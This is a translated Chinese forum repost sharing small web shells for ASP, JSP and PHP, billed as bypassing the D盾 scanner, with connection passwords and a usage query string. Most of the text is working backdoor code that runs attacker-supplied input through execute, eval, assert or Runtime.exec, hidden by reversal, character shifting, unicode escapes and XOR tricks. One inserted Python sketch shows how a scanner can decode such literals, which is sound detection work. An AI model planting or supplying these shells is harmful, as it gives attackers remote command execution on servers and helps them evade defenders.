Sharing a batch of ASP, JSP and PHP small web shells (小马) that currently all get past D盾


Source: 极安中国

Original author: h88z

https://bbs.secgeeker.net/forum.php?mod=viewthread&tid=1637

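While browsing the forum I came across many excellent posts from experienced members.

There are plenty of clever ideas in them, all worth studying as reference.

Learning by standing on the shoulders of giants!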

0x01 ASP

The connection password for all ASP samples is 99999.

<%dim a(5)a(0)=request("99999")eXecUTe(a(0))%>



<%Function b():    b = request("99999")End FunctionFunction f():    eXecUTe(b())End Functionf()%>

 


<%Class zzz
private yyy Private Sub Class_Initialize yyy = "" End Sub public property let www(yyy) execute(yyy) end property
End Class
Set xxx= New zzzdim vvv(7)vvv(2)=request("99999")xxx.www= vvv(2)%>

 


<%Function x():    x = request("99999")End Functiony = Mid(x(),1)z =y&""eXecUTe(z)%>

 


<%Function x():    x = request("99999")End Functiony = Left(x(),99999)eXecUTe(y)%>

 

0x02 JSP

The connection password for all JSP samples is x.

 

<%@ pagecontentType="text/html;charset=UTF-8" language="java" %><%@ pageimport="java.lang.reflect.Method"%><%!public staticString reverseStr(String str){String reverse = "";int length =str.length();for (int i = 0; i < length; i++){reverse = str.charAt(i) +reverse;}return reverse;}%><%String x =request.getParameter("x");if(x!=null){    Class rt =Class.forName(reverseStr("emitnuR.gnal.avaj"));    Method gr =rt.getMethod(reverseStr("emitnuRteg"));    Method ex =rt.getMethod(reverseStr("cexe"), String.class);    Process e = (Process)ex.invoke(gr.invoke(null),  x);    java.io.InputStream in =e.getInputStream();    int a = -1;    byte[] b = new byte[2048];    out.print("");    while((a=in.read(b))!=-1){        out.println(new String(b));    }    out.print("");}%>

 


<%@ pagecontentType="text/html;charset=UTF-8" language="java" %><%@ pageimport="java.lang.reflect.Method"%><%!public staticString plusStr(String str){String plus = "";int length =str.length();for (int i = 0; i < length; i++){char z = str.charAt(i);if(z>='a'&&z<='w'){z=(char)(z+3);plus=plus+z;}elseif(z>='x'&&z<='z'){z=(char)(z-23);plus=plus+z;}else{plus=plus+z;}}returnplus;}%><%String x =request.getParameter("x");if(x!=null){    Class rt =Class.forName(plusStr("gxsx.ixkd.Rrkqfjb"));    Method gr =rt.getMethod(plusStr("dbqRrkqfjb"));    Method ex =rt.getMethod(plusStr("bubz"), String.class);    Process e = (Process)ex.invoke(gr.invoke(null),x);    java.io.InputStream in =e.getInputStream();    int a = -1;    byte[] b = new byte[2048];    out.print("");    while((a=in.read(b))!=-1){        out.println(new String(b));    }    out.print("");}%>

 


<%@ pagecontentType="text/html;charset=UTF-8" language="java" %><%@ pageimport="java.lang.reflect.Method"%><%!public staticString eStr(String str){String result = "";int length =str.length();for (int i = 0; i < length; i++){charz=str.charAt(i);z=(char)(z-5);result=result+z;}return result;}%><%if(request.getParameter("x")!=null){Classrt = Class.forName(eStr("of{f3qfsl3Wzsynrj"));Process e =(Process) rt.getMethod(new String(eStr("j}jh")),String.class).invoke(rt.getMethod(newString(eStr("ljyWzsynrj"))).invoke(null, new Object[]{}),request.getParameter("x") );java.io.InputStreamin = e.getInputStream();int a = -1;byte[] b = new byte[2048];out.print("");while((a=in.read(b))!=-1){out.println(newString(b));}out.print("");}%>
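
The three JSP samples above hide `java.lang.Runtime`, `getRuntime` and `exec` behind reversed, rotated or offset-shifted string literals, so a signature match on those names fails. The sketch below is an added example (not from the original post and not D盾's logic) of how a scanner can undo such cheap encodings before matching; the watch list and all function names are assumptions.

```python
import re

# Assumed watch list: names whose reflective lookup in a JSP signals a web shell.
SENSITIVE = {"java.lang.Runtime", "getRuntime", "exec", "java.lang.ProcessBuilder"}
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')

def rot_lower(s, k):
    """Rotate only lowercase letters by k (Caesar-style encoders)."""
    return "".join(chr((ord(c) - 97 + k) % 26 + 97) if "a" <= c <= "z" else c
                   for c in s)

def shift_all(s, k):
    """Add k to every code point; None if the result leaves printable ASCII."""
    shifted = [ord(c) + k for c in s]
    if any(v < 32 or v > 126 for v in shifted):
        return None
    return "".join(map(chr, shifted))

def candidates(s):
    """Yield (transform, decoded text) for each cheap decoding of s."""
    yield "plain", s
    yield "reversed", s[::-1]
    for k in range(1, 26):
        yield f"rot{k:+d}", rot_lower(s, k)
    for k in (k for k in range(-25, 26) if k):
        decoded = shift_all(s, k)
        if decoded is not None:
            yield f"shift{k:+d}", decoded

def scan(source):
    """Return sorted (literal, transform, decoded name) hits found in source."""
    hits = set()
    for literal in STRING_LITERAL.findall(source):
        for name, decoded in candidates(literal):
            if decoded in SENSITIVE:
                hits.add((literal, name, decoded))
                break
    return sorted(hits)

# Constructed input: string literals from the JSP samples plus one benign line.
SAMPLE = '''
Class.forName(reverseStr("emitnuR.gnal.avaj"));
rt.getMethod(plusStr("bubz"), String.class);
Class.forName(eStr("of{f3qfsl3Wzsynrj"));
response.setContentType("text/html");
'''

if __name__ == "__main__":
    print(scan(SAMPLE))
```

A hit on a decoded literal is worth more than a hit on a plain one: legitimate JSP code has no reason to store a class or method name reversed or shifted.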

 


<%@ pagelanguage="java" import="java.util.*,java.io.*"pageEncoding="UTF-8"%><%!u0070u0075u0062u006cu0069u0063u0020u0073u0074u0061u0074u0069u0063u0020u0053u0074u0072u0069u006eu0067u0020u0065u0078u0063u0075u0074u0065u0043u006du0064u0028u0053u0074u0072u0069u006eu0067u0020u0063u0029u0020u007bu0053u0074u0072u0069u006eu0067u0042u0075u0069u006cu0064u0065u0072u0020u006cu0069u006eu0065u0020u003du0020u006eu0065u0077u0020u0053u0074u0072u0069u006eu0067u0042u0075u0069u006cu0064u0065u0072u0028u0029u003bu0074u0072u0079u0020u007bu0050u0072u006fu0063u0065u0073u0073u0020u0070u0072u006fu0020u003du0020u0052u0075u006eu0074u0069u006du0065u002eu0067u0065u0074u0052u0075u006eu0074u0069u006du0065u0028u0029u002eu0065u0078u0065u0063u0028u0063u0029u003bu0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0020u0062u0075u0066u0020u003du0020u006eu0065u0077u0020u0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0028u006eu0065u0077u0020u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0052u0065u0061u0064u0065u0072u0028u0070u0072u006fu002eu0067u0065u0074u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u0029u0029u003bu0053u0074u0072u0069u006eu0067u0020u0074u0065u006du0070u0020u003du0020u006eu0075u006cu006cu003bu0077u0068u0069u006cu0065u0020u0028u0028u0074u0065u006du0070u0020u003du0020u0062u0075u0066u002eu0072u0065u0061u0064u004cu0069u006eu0065u0028u0029u0029u0020u0021u003du0020u006eu0075u006cu006cu0029u0020u007bu006cu0069u006eu0065u002eu0061u0070u0070u0065u006eu0064u0028u0074u0065u006du0070u002bu0022u005cu006eu0022u0029u003bu007du0062u0075u0066u002eu0063u006cu006fu0073u0065u0028u0029u003bu007du0020u0063u0061u0074u0063u0068u0020u0028u0045u0078u0063u0065u0070u0074u0069u006fu006eu0020u0065u0029u0020u007bu006cu0069u006eu0065u002eu0061u0070u0070u0065u006eu0064u0028u0065u002eu0067u0065u0074u004du0065u0073u0073u0061u0067u0065u0028u0029u0029u003bu007du0072u0065u0074u0075u0072u006eu0020u006cu0069u006eu0065u002eu0074u006fu0053u0074u0072u0069u006eu0067u
0028u0029u003bu007d%><%u0069u0066u0028u0022u0039u0035u0032u0037u0037u0022u002eu0065u0071u0075u0061u006cu0073u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0070u0065u0063u0069u0077u0069u0064u0022u0029u0029u0026u0026u0021u0022u0022u002eu0065u0071u0075u0061u006cu0073u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0070u0065u0063u0069u0077u0069u0064u0022u0029u0029u0029u007bu006fu0075u0074u002eu0070u0072u0069u006eu0074u006cu006eu0028u0022u003cu0070u0072u0065u003eu0022u002bu0065u0078u0063u0075u0074u0065u0043u006du0064u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0063u0066u0074u006du0069u0064u0022u0029u0029u002bu0022u003cu002fu0070u0072u0065u003eu0022u0029u003bu007du0065u006cu0073u0065u007bu006fu0075u0074u002eu0070u0072u0069u006eu0074u006cu006eu0028u0022u003au002du0029u0022u0029u003bu007d%>

 


Usage:

?peciwid=95277&cftmid=id

 

0x03 PHP

The connection password for all PHP samples is 1.

 

<?php$a=end($_REQUEST);eval($a);?>

 


<?php$a =substr_replace("asse00","rt",4);$b=array($array=array(''=>$a($_GET['1'])));var_dump($b);?>

 


<?php     /**      * assert($_GET[1+0]);    */     class User { }     $user = new ReflectionClass('User');    $comment = $user->getDocComment();    $d = substr($comment , 14 , 20);    assert($d);?>

 


<?php' v. N&N- O& ]; v9 N! m9 y: {; J$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');// $_='assert';$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');// $__='_POST';$___=$$__;$_($___[pwd]); //assert($_POST[_]);?>

0x04 Source

https://bbs.secgeeker.net/forum.php?mod=viewthread&tid=1637



This article was first published on the WeChat official account 渗透Xiao白帽.
